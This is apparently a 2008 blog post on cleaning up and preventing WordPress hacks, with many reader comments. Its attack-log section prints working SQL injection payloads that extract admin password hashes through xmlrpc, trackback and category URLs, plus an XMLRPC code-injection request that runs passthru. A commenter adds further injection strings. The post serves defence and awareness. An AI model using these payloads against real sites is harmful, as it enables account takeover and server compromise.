Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs. You did upgrade didn’t you? No? It was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.
Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.
In the last week the hackers have started again. There is no zero day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net
If you’ve been hacked
- Upgrade to the latest version of WordPress.
- Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
- Change your passwords after upgrading and make sure the hacker didn’t create another user.
- Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?
define(‘SECRET_KEY’, ’1234567890′ );
Hidden Code
The bad guys are using a number of ways to hide their hacks:
- The simplest way is hiding their code in your php scripts. If your blog directory and files are writable by the webserver then a hacker has free reign to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten so make sure you double check those files for any strange code that uses the
eval()command, orbase64_decode(). Here’s a code snippet taken from here:
< ?phpAnother hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.
- Check your .htaccess file in the root of you blog. If you've never edited it, it'll should look like this:
# BEGIN WordPress
<ifmodule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</ifmodule>
# END WordPressThat file may have this chunk of code too which is to do with the uploader:
<ifmodule mod_security.c>
<files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</files>
</ifmodule> - They're also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
- Open PHPMyAdmin and go to your blog's options table and find the active_plugins record.
- Edit that record. It's a long line. Scroll through it and you'll find an entry that looks like
../uploads/2008/05/04/jhjyahjhnjnva.jpg
. Remove that text, and make sure you remove the serialized array information for that array record. If that's beyond you, just delete the active_plugins record and reactivate all your plugins again. - Check your uploads directory for that jpg file and delete it.
- This Youtube video shows how to do that. I don't think there's any urgent need to remove the rss_* database record but it won't hurt to do it.
Change Your Passwords
Once you've upgraded and verified that your install is clean again you must do the following:
- Change the passwords of all users on your system.
- Make sure the hacker hasn't added another user account he can use to login again.
Stop the bad guys
One way of stopping the bad guys before they've done any major damage is by doing regular backups and installing an intrusion detection system (IDS).
- I use Backuppc to backup all my servers every night, and a simple MySQL backup script to dump the database daily.
- The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I'll get an email within a day about it. It does take some fine tuning, but it's easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):
# apt-get install aide
# vi /etc/aide/aide.conf.d/88_aide_web
# /usr/sbin/aideinitIn the configuration file above I put the following:
/home/web/ Checksums
!/home/www/logs/.*
!/home/web/public_html/wp-content/cache/.*
!/home/web/.*/htdocs/wp-content/cache/.*That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.
Please Upgrade
There is absolutely no reason not to upgrade. WordPress is famous for it's 5 minute install, but it takes time and effort to maintain it. If you don't want the hassle of upgrading, or don't know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn't an advert for WordPress.com, go with any blogging system you like, but don't make life easy for the scum out there who'll take over your out of date software and use it to their advantage.
Help a friend
Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:
<meta name="generator" content="WordPress 2.5.1" /> <!-- leave this for stats -->
What does a hack look like?
I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that's not installed. The bots are so dumb they'll even come back again and again performing the same attacks.
Here's what I call the "ekibastos attack". It happens over a number of requests and I've seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)" which strangely enough doesn't show up on Google at all right now.
- First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
- Then he POSTs to wp-admin/admin-ajax.php with the following POST body:
POST: Array
(
[cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
) - When that fails, he grabs xmlrpc.php.
- He then POSTs to that script, exploiting an old and long fixed bug. Here's a snippet of the data.
HTTP_RAW_POST_DATA: <?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>
<member><name>params</name><value><array><data>
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
</data></array></value></member></blockquote>
- That fails too so the query is repeated with similar SQL.
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
- Then he tries a trackback:
URL: /wp-trackback.php?tb_id=1
POST: Array
(
[title] => 1
[url] => 1
[blog_name] => 1
[tb_id] => 666666\'
[1740009377] => 1
[496546471] => 1
) - And another trackback:
URL: /wp-trackback.php?p=1
POST: Array
(
[url] => ekibastos
[title] => ekibastos
[excerpt] => ekibastos
[blog_name] => +AFw-\')/*
[charset] => UTF-7
) - Before finally going back to xmlrpc.php with this POST request:
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>k1b0rg' icq: 76-86-20</string></value></param>
<param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
<param><value><string>admin</string></value></param>
</params>
</methodCall> - In between, he also tries the following GET requests:
GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1 - Thankfully I upgraded and all those attacks fail.
Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn't convince you that you must upgrade and check your website, I don't know what will.
PS. For completeness, here's another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.
<?xml version="1.0"?>
<methodCall>
<methodName>test.method
</methodName>
<params>
<param>
<value><name>','')); echo
'______BEGIN______';
passthru('id');
echo
'_____FIM_____';
exit;/*</name></value>
</param>
</params>
</methodCall>
Edit: Tripwire url fixed, thanks Callum
PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.
Pingback: What to Do If Your Blog Gets Hacked
Hi. These three strings I think were typed into the search box on our blog yesterday morning. The search box is on any of our public pages, though I suppose anyone familiar with wordpress can find it? When checking the plug in Spy, we saw these three things: Can you tell us what they are? Any help would be greatly appreciated.
‘)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users#
?s=�%27%29%29%29%2F**%2FAND%2F**%2FID%3D-1%2F**%2FUNION%2F**%2FSELECT%2F**%2F1%2C2%2C0x3a%2Cuser_login%2C0x3a%2Cuser_pass%2C0x3a%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2F**%2FFROM%2F**%2Fwp_users%23
eed=rss2&p=11/**/union/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a),2/**/from/**/wp_users/**/where/**/user_id=1/*
January 11, 2009
Greg – check your theme properly escape search strings. Make sure it doesn’t print $s directly, it should use the_search_query()
Oh, and change the passwords on all your users, just in case.
Hi Doncha. I do not know what I am doing. Can you tell me which file to look in for the code you are talking about? Greatly appreciated. Thanks Greg
Greg – Probably index.php in your theme folder.
Thanks. I checked the server version of the index.php file in the default themes folder, and it has not been modified since two weeks ago, so that should rule it out. I uploaded the one from my local machine to write over it just to be sure. I also reviewed all the modification dates of every non database file on the remote server, and nothing was modified since the search string hack attempt I posted. If you can think of anything else, please let me know. And in any event, thanks for the fast reply and the help. Greg
Pingback: Hack Alert for Blogs! : MARIKENYA.com
I just wanted to add that in many cases its good to have a second layer of protection that includes the protection of the plugins etc.
I strongly recommend phpids for this, its a software for php 5.2.x that protects scripts against almost all sql injections and xss attacks;)
Regards,
Malicious
Pingback: XmasB » XmasB.com er hacket
Thank you very much for making this post! It was very helpful.
Thanks for the great content! I had to go through my entire database, post by post to find the hidden iframes code the hacker left behind!
Hopefully now I have resolved the problem. Thanks again.
I am a perfect n00b and my group pf blogs were hacked. I was using on them all WordPress 2.7 and I had long passwords like: Uh5″ôD$id?!MS) but It was hacked yesterday and I am still trying to make them work. My hosting company midphase.com helped me to get one of ‘em online and running but the others remain hacked: miautoculiacan.com the content is there and I can enter the admin panel with my password and I am just trying to understand everything. My .htaccess reads like this:
# -FrontPage-
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
order deny,allow
deny from all
allow from all
order deny,allow
deny from all
AuthName http://www.internetpymes.com
AuthUserFile /home/intebas7/public_html/_vti_pvt/service.pwd
AuthGroupFile /home/intebas7/public_html/_vti_pvt/service.grp
# BEGIN WordPress
# END WordPress
Where do I keep looking? Am I in the right direction?
) Looking desperatetly for help 
383 Comments
Piggy and Tazzy (1 comments.) on June 8, 2008 at 2:01 pm.
What an excellent and well written post.
I’ve been vulnerable and paid the price in the past. Thanks to articles such as this one I hope I’m a bit better protected these days.
But they are clever bastards and trying to keep ahead of them is hard sometimes. I wonder just how many people don’t have the time (or indeed the knowledge) to find out how to protect themselves properly.
It’d be great if WordPress could publish info such as this right on the front page, so that it’s brought to peoples attention more easily.
Anyway, as I say, great post. Thanks for spending the time putting it out there for the rest of us.
Pingback: 0-day WordPress Exploit? :: WPLover
Pingback: Tip: WordPress hacked? » Solo Technology
Jenny (5 comments.) on June 8, 2008 at 3:19 pm.
Wow. That is nuts. I’ve upgraded!
fivecentnickel.com (1 comments.) on June 8, 2008 at 3:26 pm.
Umm… WordPress 2.5.0 and 2.5.1 appear to vulnerable to this attack. I’ve personally helped a couple of people that were taken down by this hack (the one that redirects to anyresults.net).
Here is an example of someone dealing with it on 2.5.x:
http://www.getrichslowly.org/blog/2008/06/08/patching-the-wordpress-anyresultsnet-hack/
I’ve done some digging, and it appears to be pretty widespread. Lots of sites that I frequent are affected.
The only other possibility that I can think of is that DreamHost has been compromised (I think many of these sites are on DH — could it be that they’ve gotten in and are attacking these installs from the inside?).
Noah Ark (1 comments.) on June 8, 2008 at 3:28 pm.
nice write up, thanks for sharing this
Pingback: » More Info on the WordPress AnyResults.net Hack for Hijacking Search Traffic
DeBlog (1 comments.) on June 8, 2008 at 3:41 pm.
Great post. What about WP Security Scan Plugin? Is it ok to use, in order to see your WP security gaps?
oerl (1 comments.) on June 8, 2008 at 4:14 pm.
I wonder that’s why my blog getting the same referers for all article again and again
Viv on June 8, 2008 at 5:39 pm.
Thanks for the heads up on keymachine.de I keep seeing that one on a regular basis and have been tempted to just ban the whole domain, now I will!
TheChrisD (71 comments.) on June 8, 2008 at 6:04 pm.
Very informative, Donncha. Will keep those things in mind! Never know what might happen…
alex (1 comments.) on June 8, 2008 at 6:13 pm.
Good post, but as far as I remember, there is also a way to hide code only in the database, so it would take some time to detect and find it.
Mahmoud Al-Qudsi (1 comments.) on June 8, 2008 at 6:27 pm.
Great post, Donncha. Thanks for clarifying exactly how these hacks work and underlining the importance of upgrading to the latest versions as soon as they’re available!
Sunny (2 comments.) on June 8, 2008 at 7:10 pm.
Thanks for the warning, someone contacted me regarding this issue of Google link redirecting and I thought it was an anomaly and asked them to check again. The second time she checked, the link directed to the correct page. Does that mean the hacked code somehow got overwritten? Or does the link redirection happens once in every “x” clicks or something to that order? The WP version is 2.5.1. Any input will be highly appreciated!
Donncha (1707 comments.) on June 8, 2008 at 7:15 pm.
fivecentnickel.com – I think there’s a good chance they were compromised before they upgraded. So many sites were hijacked the previous time the hackers activated their payload that there was bound to be a second wave.
It’s probably worth double checking even if your site doesn’t exhibit any of the redirect problems. I know I grepped all my installs just in case.
Pingback: Zero-Day WordPress Exploit? Probably Not · Pressed Words
Michael (2 comments.) on June 8, 2008 at 7:17 pm.
WP Security Scan is constantly updated.
http://semperfiwebdesign.com/custom-applications/wp-security-scan/
Gustavo Leig (1 comments.) on June 8, 2008 at 7:26 pm.
Very good tips, a hack could be hard to be found but my guess you should always validate your feed.
feedvalidator.org is a good tool you can you to take a look of what is being published and search for strange links, domains, etc..
Guillermo (1 comments.) on June 8, 2008 at 7:46 pm.
Thank you for this post, Donncha.
kim (1 comments.) on June 8, 2008 at 8:19 pm.
great info. thanks a lot
not hacked this time around but will go through the list
Pingback: Nasty wordpress redirect hack widespread - Netpond ™
Pingback: Doneraile Photowalkers
Pingback: Upgrade your Wordpress, I really mean it! - Netpond ™
Shari (1 comments.) on June 8, 2008 at 11:07 pm.
My blog got hacked. It makes me mad that the hackers can’t find a way to do something good with their skills rather than picking on innocent people.
Thanks for a great post. I learned a lot!
Nik Cubrilovic (1 comments.) on June 9, 2008 at 12:38 am.
“That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.”
and thats exactly why cache should be outside of webroot, and almost everything else as well (plugins etc.) because guess where the next backdoor script is going to be placed..
I host 9-10 wp blogs on a server, all running current. they have been hacked with 0day exploits 3 times in 6 months now. one of the blogs had so many pharma pages added to it that it was bringing the whole server to a crawl from the traffic.
Ãlvaro Degives-Más (8 comments.) on June 9, 2008 at 2:46 am.
Here’s another tip: aside from checking file/directory permissions, make sure you don’t have obsolete JS directories/libraries lingering about. Much to my consternation I realized some “mysterious” pages were uploaded with an exploit of a JavaScript WYSIWYG (TinyMCE) editor. In my case, I did a full WP install refresh (just clearing out almost everything and uploaded a new set) as well as combing through all directories to find any suspect “additions” and that was the end of it.
Marcin (1 comments.) on June 9, 2008 at 4:29 am.
What’s the deal with the 2.3 and 2.5 branches of WordPress being plagued with security vulnerabilities??!! The older, (better, imo) WordPress 2.2.3 is not affected by any of the vulnerabilities discovered once these new versions were released.
I believe this question deserves an answer from the WordPress developers. It’s as if security was completely thrown out the window with the release of 2.3.
Pingback: » WordPress-Crackereien ohne Ende. Diesmal … Nachtwächter-Blah
himanshu (1 comments.) on June 9, 2008 at 4:56 am.
you are right xmlrpc.php exploit can be done easily with previous versions of wordpress, my blog was also atacked many times…
However the latest upgrade resolve the issues, just a tip for other users make sure that you block IP’s through which attacks and spammers are coming that will really help you.
Regards,
Himanshu
Dustin (1 comments.) on June 9, 2008 at 6:38 am.
I was hacked a few months ago…unfortunately for the hacker, i hadn’t started working on my site yet (still haven’t actually
). Thankfully it was nothing more than a kiddie playing with his computer. 10 minutes on my FTP and my site was back to normal. I made sure to delete EVERY file that had been uploaded and/or modified the day the hack happened. That made cleanup REALLY easy if anyone ever has this happen to them. I even too a screenshot of my site hacked 
http://img241.imageshack.us/img241/5268/fuckxa9.png
Pingback: Are You Backing Up Your Blog? | Butterfly Media Romania Blog - Marketing, SEO and WordPress
bilal ghouri (1 comments.) on June 9, 2008 at 8:09 am.
wow, thanks buddy, these tips really helped me a lot, i will now upgrade to latest version when ever its out
currently, Im on latest version, but I didnt upgrade for a long time until I noticed some bugs in older version..
Thanks again
Pingback: WangenWeb Weekly Digest (23/08) | WangenWeb
Pingback: Il vostro sito WordPress è stato violato? » Ubuntu block notes
riz on June 9, 2008 at 11:14 am.
How do u find out whether the blog is hacked or not?
Pingback: Preventing Hacks and Protecting Wordpress
Jim (1 comments.) on June 9, 2008 at 1:47 pm.
I know of at least 6 exploits for WordPress 2.5.1 that allows remote SQL injection.
Thomas David Baker (1 comments.) on June 9, 2008 at 1:56 pm.
Serves me right for running an out of date WordPress I guess. Exact same attack, exact same IP address … 87.118.100.81 … I have informed abuse@keyweb.de. I wish I’d read this yesterday, though! Off to restore from backup …
Donncha (1707 comments.) on June 9, 2008 at 2:03 pm.
Jim – so, why don’t you contact security@wordpress.org?
Michael (2 comments.) on June 9, 2008 at 2:06 pm.
Jim,
If you genuinely know of 6 WordPress 2.5.1 exploits, I encourage you to contact me as I will appropriately update WP Security Scan.
Chad Butler (1 comments.) on June 9, 2008 at 2:19 pm.
Excellent post.
I had similar issues a couple months ago and had to do a clean install of WP to move on. But I also found that simply changing my password wasn’t enough. I also had to create a new administrator and delete the WP default admin account.
http://butlerblog.com/2008/06/09/delete-original-wp-admin-account-for-additional-security/
Nico (1 comments.) on June 9, 2008 at 4:29 pm.
Thank you so much this post. I upgranded to 2.5.1 the day it came out, but I’ve seen the attempts in WussUp and was not familiar with what they were trying to do, other than a vague suspicion it was probably malicious.
I’ve heard from several other WP bloggers who’ve been hacked, and I will definitely be forwarding this post to them.
Thanks again!
kathy (6 comments.) on June 9, 2008 at 4:34 pm.
Thank you SO MUCH for this article. I’ve definitely seen weird re-directs but I don’t know when they started since I rarely check my stats. Sigh. I don’t see any changed files and keep my server permissions rather tight (755 on directories and 644 on files) but something is wrong.
At least with your article I have a starting point. I’m running 2.1.3 and got complacent….
Pingback: Il tuo Wordpress è stato compromesso? » Archivi Blog » WordPress Italy
Pingback: Se descubre nueva variante del hackeo que redirecciona los blogs de WordPress
Matthew S. on June 9, 2008 at 5:31 pm.
It only takes one time to learn. I got hacked two weeks ago before I upgraded and installed the security plugin. I haven’t had a problem since… just make sure ou leave the scanner activated, and keep a lookout for WP upgrades. Doesn’t 2.6 come out soon?
Summer Brooks (3 comments.) on June 9, 2008 at 5:59 pm.
Don’t forget to check the database for cruft left by the attacker if they do get in.
During the April attacks, I had cleaned up the files that had been compromised, but they still got back in a week or so later because some of the options had been tampered with, and a WordPress upgrade to 2.5 didn’t fix it.
Actually viewing the tables was the only way to see the hidden user they’d created… there was no way to see it from inside the WP admin panels.
kathy (6 comments.) on June 9, 2008 at 6:55 pm.
I can’t find any files which have changed, and I’m hoping this is due to the permissions I have set, so I can only assume they made some database additions. I have no idea how to check that out but I’m off to see what I can find.
Pingback: Wordpress Redirect h4x’s - ShoeMoney®
kathy (6 comments.) on June 9, 2008 at 9:33 pm.
Ok, I’ve upgraded to 2.5.1. Thank you SO MUCH for this article. When I ran upgrade.php WP upgraded the database also. (shrug) I did find 2 users I didn’t know anything about and just deleted all my users, even my own id, leaving only admin and then changed the password.
i hope that is enough and i don’t have to go into the database (scary).
Jaime (1 comments.) on June 9, 2008 at 9:39 pm.
One thing I do is delete xmlrpc.php. I don’t have any reason to post to my blog through it, and it’s been so bad for security, that I just blow it out. Another thing I do is cat /dev/null > wp-trackback.php which makes it an empty file with no functionality. I hate trackbacks… they drive me nuts, and it seems they too have been responsible for badness. From those two things, I’ve been able to weather these security lapses via the common methods. I got smacked by a bug via an email plugin that allowed spammers to inject email into it, but that’s another story.
mostly cajun (1 comments.) on June 9, 2008 at 10:42 pm.
I got hacked. I sadly admit that I don’t know when it happened, but I caught it when I was going through referrals as listed in my SiteMeter account and I found that my site had taken a couple of google referrals for some drug.
Since I’d never posted about that drug, I thought it possible that it was comment spam, although Akismet (and Spam Karma before that) had done well in stopping comment spam.
It led me to a post on my blog. I did a “view source” in FireFox and concluded that there was code added to my “footer.php” file. I opened the file in the admin suite and cut the offending code.
How does this stuff get in?
Melvin (1 comments.) on June 9, 2008 at 11:17 pm.
this is informative… maybe wordpresss should make another updata again…
Pingback: File change notifications for your WordPress blog on Linux | Peter’s Useful Crap
Linda MacPhee-Cobb (1 comments.) on June 10, 2008 at 1:26 am.
I just released a security plugin
http://herselfswebtools.com/2008/06/wordpress-security-plugin-block-scrapers-hackers-and-more.html
part two of a three part set. This will stop people scanning your site with the user agent Security Kol which is where most of these attacks are originating.
Use it or use another security plugin. I wrote this after my Coppermine site was hacked a couple of months ago.
Sherif Elsisi (2 comments.) on June 10, 2008 at 2:00 am.
I got hit and some of my hosting customers as well.
Thanks for showing the query they try from the url to access wp_users table. That’s why I think one of the most important steps is to change your table prefix to something other than wp_, to make it impossible to find out.
Also, stay away from fantastico installations, they are insecure.
Regards.
kathy (6 comments.) on June 10, 2008 at 2:33 am.
Ok, I upgraded, installed security plugins and still am having the referral problems. No files on my server were changed. After the upgrade they would have been gone anyway. So I downloaded and uploaded and activated a new theme – still wacky referrals, so it must be my database. I’m now renaming all the tables from wp_ to something else. Sigh.
Any ideas where to find the database crud?
Pingback: Has Your WordPress Been Hacked Recently? | WordPress Philippines
DT on June 10, 2008 at 3:37 am.
Kathy, have you tried your theme folders? I had a .jpg image there called single_old.jpg which was the rogue file.
Pingback: Is Your WordPress Site Safe From Hackers? | Pixelita Design Blog
Summer Brooks (3 comments.) on June 10, 2008 at 5:06 am.
@kathy,
The database crud I found was in wp_users and wp_options.
I posted details about what I found in the WP forums back in April/May when it happened the first time.
The post with what to look for is http://wordpress.org/support/topic/168964#post-740607
The other thread with info to look for is http://wordpress.org/support/topic/141041
Basically, look for any entry in one of your options fields that has a strange looking file path with lots of dotdotslashes in it.
Pingback: links for 2008-06-10 at nyc.locationscout.us
Pingback: WinExtra » From the Pipeline – 6.9.08
Anonymous Person :) on June 10, 2008 at 1:11 pm.
Is 2.3.3 okay?
The reason why I don’t upgrade is because the true blue theme for K2 hasn’t updated. I love that theme!
kathy (6 comments.) on June 10, 2008 at 3:37 pm.
@Summer – looking at the database itself, I have no weird active plugins and checking the options table I have no weird theme stuff. Looking at the database (from phpadmin) I see only one user and it isn’t admin as I changed that userid yesterday. I am still getting weird referrals so there is something somewhere in something. i’m going to check the jpg’s again – maybe an old theme or a non-active theme? Maybe I’ll just wipe the content directory and start from scratch…
paul - bloggingsupport.com (1 comments.) on June 10, 2008 at 4:28 pm.
Maybe it would be a great idea to have a plugin that can check for these vulnerabilities ? Something that can check against these routines ?
My knowledge of WP plugins is limited, but feel free to use the idea !
Paul – BloggingSupport.
Pingback: wordpress two point five, what's the verdict? - Irish SEO, Marketing & Webmaster Discussion
Pingback: Bitwire.TV | WordCast 16: Serenade the Developers
Summer Brooks (3 comments.) on June 10, 2008 at 8:09 pm.
@kathy,
I discovered yesterday that the same 2 IP addresses were bombarding a server of mine, trying to access wp-comments-post.php for a handful of websites using fake referrers from those same websites.
I knew they were fake because I’d moved those 15-20 domains off that one server and onto another one to prep the old one for a rebuild. The referrers were fake because there was no activity on the real sites matching those hits, and no way the real sites would have referred over to the old server for those calls.
Maybe what you’re seeing and what I was seeing yesterday was just an attack of comment spams? I’m just wondering if they chose the old IP of those domains, and had it hard-coded into their script because the sites had been previously hacked a few months ago. But yes, I went through the themes again just to be sure, and I didn’t find anything this time.
The increase in attacks is both annoying and disturbing.
Michael Cruz (1 comments.) on June 11, 2008 at 1:26 am.
thanks for this article. I unfortunately have suffered from the spam link hack. And like your article discussed, upgrading after the fact is too late. It got me bumped off google for awhile. Thought I had licked it and that is when I discovered that there were still problems.
Guess I have to dedicate a saturday to following all the advice in this article!
Takuya (1 comments.) on June 11, 2008 at 4:12 am.
Thanks for your great information.
I can have a new tech from your blog.
Pingback: Did your WordPress site get hacked? « htpasswd
Ãlvaro Degives-Más (8 comments.) on June 11, 2008 at 6:07 am.
Confirmed: TinyMCE gets hammered on my place, which is running WP 2.5.1. My simple solution: I’ve taken down the whole /wp-includes/js/tinymce/ directory and everything underneath – problem cleanly solved.
No more issues with that @#$% editor messing up my tags, either: pure win-win.
Dhruva Sagar (3 comments.) on June 11, 2008 at 7:11 am.
Thanks for the very informative post…
Some of the best practices that I follow in order to keep my blog safe (although it’s not really very unsafe, not being very popular) are that I change my password regularly, every month. Passwords I use are very strong have combination of upper and lower case, special characters and numbers.
I update my blog regularly, with the help of the automatic wordpress update plugin, it really is a matter of a few clicks so I recommend that to everyone.
Arthur (1 comments.) on June 11, 2008 at 10:13 am.
I recently upgraded my website but before I saw some of the codes posted here. It seems I need to root whatever evil is hiding now inside my blog.
Thanks for this very informative article.
Rajesh on June 11, 2008 at 10:51 am.
how did you trace it in such a detailed manner ? Is it thro. AIDE?
Pingback: Are you running Wordpress? Your blog might have been hacked right now.
Donncha (1707 comments.) on June 11, 2008 at 11:15 am.
Rajesh – I logged all POST requests to a test server. Handy for telling me when the bad guys are attacking!
Pingback: Hack Hacking Hacked WordPress | BigDadGib.net
Pingback: My Blog Was Hacked. Is Yours Next? Huge Wordpress Security Issues
Pingback: Wordpress Security Issues | Object of my obsession
Pingback: Jeffro On WordCast | Jeffro2pt0
Pingback: Wordpress Hacked! Time to upgrade to 2.5.1 | bl(e)nd|wire.net
Pingback: A Subtle Reminder to Upgrade Your Blog Software
Pingback: Znów ataki na WordPressowe blogi « zielony bloger pl
Pingback: Vpoint7’s Webmaster Blog » Blog Archive » Did your WordPress site get hacked?
Cody Sortore (2 comments.) on June 12, 2008 at 7:17 am.
Wow! Thanks, I wasn’t even aware of the security flaw… I upgraded when 2.5.1 came out, but didn’t realize that it was so potentially threatening. I plan on checking all of my sites to make sure they’re not vulnerable!
Pingback: Is your Wordpress blog hacked? Why not upgrade to the latest version? | MyTestBox.com - web software reviews
Pingback: TechCrunch Japanese アーカイブ » Wordpressã®ã‚»ã‚ュリティå•é¡Œã§å¤§é‡ã®ãƒãƒƒã‚ングãŒç™ºç”Ÿã€‚次ã¯ã‚ãªãŸã®ãƒ–ãƒã‚°ï¼Ÿ
Paul Browne - FirstPartners Blog (4 comments.) on June 12, 2008 at 9:23 am.
Donncha,
Do you know of any plugins that take a checksum of your particular wordpress install, then notify you if any of your files change.
Same idea as the Intrusion Detection System you mention, but maybe easier for most users?
Paul
Donncha (1707 comments.) on June 12, 2008 at 9:42 am.
Paul – there’s this file change plugin that would be useful if you don’t want to run AIDE or Tripwire.
I wouldn’t run it as often as an hour because the find command could be intensive if your site has lots of files.
It also won’t find files that have been modified but had the modification time reset by “touch”.
I’m not aware of a php script that records checksums. That’d be useful, except that hackers could manipulate the data easily.
Pingback: Security Issues in Wordpress
Pingback: Internetpret voor 2008-6-12 :: Dikkie
kathy (6 comments.) on June 12, 2008 at 6:39 pm.
Thank you! Thank you! Thank you!!!
I had 2 days of redirects after I made each change in your article (the table prefix was hardest) but it has paid off. By the time I did the very last thing – the table prefix I was finding my site in the google searches anymore.
It was a LOT of work (since I am clueless when it comes to this stuff) but I got it done. There are two other sites mentioned in the comments – the 9 things and the 10 things lists and those are very helpful also. I also installed a security plugin http://semperfiwebdesign.com/plugins/wp-security-scan/ and a login lockdown plugin http://www.bad-neighborhood.com/(let me look for the links) but couldn’t get the password plugin to work. Fatal errors. (ask apache password protect)
Pingback: Alfabetic » Blog Archive » Wordpress cuestiones de seguridad llevar a la piraterÃa informática en masa. ¿Es su blog el siguiente paso?
Pingback: With Proper Training… » Blog Archive » links for 2008-06-12
Bryn (1 comments.) on June 13, 2008 at 3:36 am.
Well luckily for me my blog is new so I haven’t experienced that yet but this is good information to know for the future.
Pingback: » Search for this code in your Wordpress blog » The Antivirus blog
Pingback: Friday Fresh Links and Announcements | Tech Suave
Mario Stocco (2 comments.) on June 14, 2008 at 7:35 pm.
Donncha, Thanks for the write-up but one of the harder parts to fix is the indexing down by Google if your site is compromised. I got nicked by a WordPress flaw and now I spend my time getting things corrected with Google and Yahoo.
Cheers
Ãlvaro Degives-Más (8 comments.) on June 14, 2008 at 8:24 pm.
Mario, if you have a sitemap and communicate it to Google and Yahoo regularly and properly (there are several plugins that can do that for you, both from a SEO point of view and as a “pure” sitemap generator) the poisoned links should be flushed out within a week or so. Also, I’ve found that the Google, Yahoo and (Windows) Live teams involved in indexing are helpful, when you’re really stuck in the aftermath of a hack attack aimed at poisoning your site with (malicious) links.
Also, if you have an account with Google, sitemap management with them is a breeze:
http://google.com/webmasters
As to Yahoo, you can keep track of your indexed pages with their Site Explorer:
https://siteexplorer.search.yahoo.com/
I wholeheartedly recommend Arne Brachhold’s XML Sitemaps plugin, which makes index tracking and management a lot easier: something which is essential in the last step after a (sadly) successful hack attack – the clean-up of the mess.
Good luck.
Ãlvaro Degives-Más (8 comments.) on June 14, 2008 at 8:29 pm.
Forgot to add the link to the corresponding Microsoft Live webmaster / indexing tools pages:
http://webmaster.live.com
Mario Stocco (2 comments.) on June 15, 2008 at 2:56 am.
Ãlvaro: Thanks for the reply. My solution was to write my own CMS platform from scratch and delete WordPress and any PHP.
I do have a python script that dynamically walks the structure of my site and returns a valid sitemap.xml document for Yahoo/Google to parse.
The sitemaps were submitted 2 weeks ago and have been touched by Googlebot twice in that time.
The issue is other infected sites that have thousands of links pointing back to me referencing adult or pharmaceutical content that I have since removed. From Google’s Webmaster Dashboard, the “What Googlebot sees” section continues to view my site as adult oriented.
Pingback: Biasakan Selalu Upgrade Blog Anda ! « 3lo9hien’s Weblog
Pingback: Une semaine avec Wordpress #15
Pingback: WordPress sikkerhedsfejl fører til mange hackede blogs | Gigahost Blog
